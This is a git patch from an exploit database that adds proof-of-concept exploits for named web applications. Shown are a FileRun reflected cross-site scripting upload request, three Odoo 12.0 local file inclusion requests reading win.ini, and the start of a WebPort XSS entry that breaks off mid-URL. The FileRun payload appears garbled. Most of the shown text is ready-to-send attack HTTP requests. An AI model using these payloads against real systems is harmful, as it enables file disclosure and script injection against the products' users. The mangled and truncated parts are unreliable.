From 09b5d3c1b686bdbae57e606afede6e29798735e8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 23 Jun 2020 05:02:25 +0000 Subject: [PATCH] DB: 2020-06-23 6 changes to exploits/shellcodes Frigate 2.02 - Denial Of Service (PoC) FileRun 2019.05.21 - Reflected Cross-Site Scripting Student Enrollment 1.0 - Unauthenticated Remote Code Execution Odoo 12.0 - Local File Inclusion Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload WebPort 1.19.1 - Reflected Cross-Site Scripting WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting --- exploits/multiple/webapps/48607.txt | 62 +++++++++++++++++++++++++++++ exploits/multiple/webapps/48609.txt | 57 ++++++++++++++++++++++++++ exploits/multiple/webapps/48611.txt | 30 ++++++++++++++ exploits/php/webapps/48608.py | 44 ++++++++++++++++++++ exploits/php/webapps/48610.txt | 24 +++++++++++ exploits/php/webapps/48612.txt | 30 ++++++++++++++ files_exploits.csv | 7 ++++ 7 files changed, 254 insertions(+) create mode 100644 exploits/multiple/webapps/48607.txt create mode 100644 exploits/multiple/webapps/48609.txt create mode 100644 exploits/multiple/webapps/48611.txt create mode 100755 exploits/php/webapps/48608.py create mode 100644 exploits/php/webapps/48610.txt create mode 100644 exploits/php/webapps/48612.txt diff --git a/exploits/multiple/webapps/48607.txt b/exploits/multiple/webapps/48607.txt new file mode 100644 index 000000000..4b60ef2d3 --- /dev/null +++ b/exploits/multiple/webapps/48607.txt @@ -0,0 +1,62 @@ +# Exploit Title: FileRun 2019.05.21 - Reflected Cross-Site Scripting +# Date: 2019-07-01 +# Exploit Author: Emre ÖVÜNÇ +# Vendor Homepage: https://www.filerun.com/ +# Software Link: https://filerun.com/download +# Version: v2019.05.21 +# Tested on: Windows/Linux +# CVE: CVE-2019-12905 + +# CVE-2019-12905 +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12905 +# https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3 + +# PoC + +To exploit vulnerability, someone could upload an allowed file named “> to impact users who open the page. + +POST /filerun/?module=fileman§ion=do&page=up HTTP/1.1 +Host: [TARGET] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) +Gecko/20100101 Firefox/67.0 +Accept: */* +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://172.16.191.129/filerun/ +Content-Type: multipart/form-data; +boundary=---------------------------142096305821079611661465592403 +Content-Length: 6034 +DNT: 1 +Connection: close +Cookie: FileRunSID=aqlneuv86ccj3pi4h476faopi5 + +-----------------------------142096305821079611661465592403 +Content-Disposition: form-data; name="flowTotalSize" + +5100 +-----------------------------142096305821079611661465592403 +Content-Disposition: form-data; name="flowIsFirstChunk" + +1 +-----------------------------142096305821079611661465592403 +Content-Disposition: form-data; name="flowIsLastChunk" + +1 +-----------------------------142096305821079611661465592403 +Content-Disposition: form-data; name="flowFilename" + +â��>.jpg +-----------------------------142096305821079611661465592403 +Content-Disposition: form-data; name="path" + +/ROOT/HOME +-----------------------------142096305821079611661465592403 +Content-Disposition: form-data; name="file"; filename="â��>.jpg" +Content-Type: image/jpg + +<%@ I said you should learn! %> + + +-----------------------------142096305821079611661465592403-- \ No newline at end of file diff --git a/exploits/multiple/webapps/48609.txt b/exploits/multiple/webapps/48609.txt new file mode 100644 index 000000000..5ecdf7e72 --- /dev/null +++ b/exploits/multiple/webapps/48609.txt @@ -0,0 +1,57 @@ +# Exploit Title: Odoo 12.0 - Local File Inclusion +# Date: 2019-06-14 +# Exploit Author: Emre ÖVÜNÇ +# Vendor Homepage: https://www.odoo.com/ +# Software Link: https://www.odoo.com/tr_TR/page/download +# Version: v12.0 +# Tested on: Windows/Linux +# https://github.com/EmreOvunc/Odoo-12.0-LFI-Vulnerabilities +# https://www.odoo.com/security-report + +# PoC-1 +To exploit vulnerability, someone could use +'http://[HOST]:8069/base_import/static/c:/windows/win.ini' +request to get some information from the target. + +GET /base_import/static/c:/windows/win.ini HTTP/1.1 +Host: [TARGET] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) +Gecko/20100101 Firefox/67.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +# PoC-2 +To exploit vulnerability, someone could use 'http://[HOST]:8069/ +web/static/c:/windows/win.ini' request to get some information from the +target. + +GET /web/static/c:/windows/win.ini HTTP/1.1 +Host: [TARGET] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) +Gecko/20100101 Firefox/67.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +# PoC-3 +To exploit vulnerability, someone could use 'http://[HOST]:8069/ +base/static/c:/windows/win.ini' request to get some information from the +target. + +GET /base/static/c:/windows/win.ini HTTP/1.1 +Host: [TARGET] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) +Gecko/20100101 Firefox/67.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 \ No newline at end of file diff --git a/exploits/multiple/webapps/48611.txt b/exploits/multiple/webapps/48611.txt new file mode 100644 index 000000000..5f55df603 --- /dev/null +++ b/exploits/multiple/webapps/48611.txt @@ -0,0 +1,30 @@ +# Exploit Title: WebPort 1.19.1 - Reflected Cross-Site Scripting +# Date: 2019-05-30 +# Exploit Author: Emre ÖVÜNÇ +# Vendor Homepage: https://webport.se/ +# Software Link: https://webport.se/nedladdningar/ +# Version: v1.19.1 +# Tested on: Windows/Linux +# CVE-2019-12461 +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12461 +# https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS + +# PoC + +To exploit vulnerability, someone could use 'http:// +[server]:8090/log?type="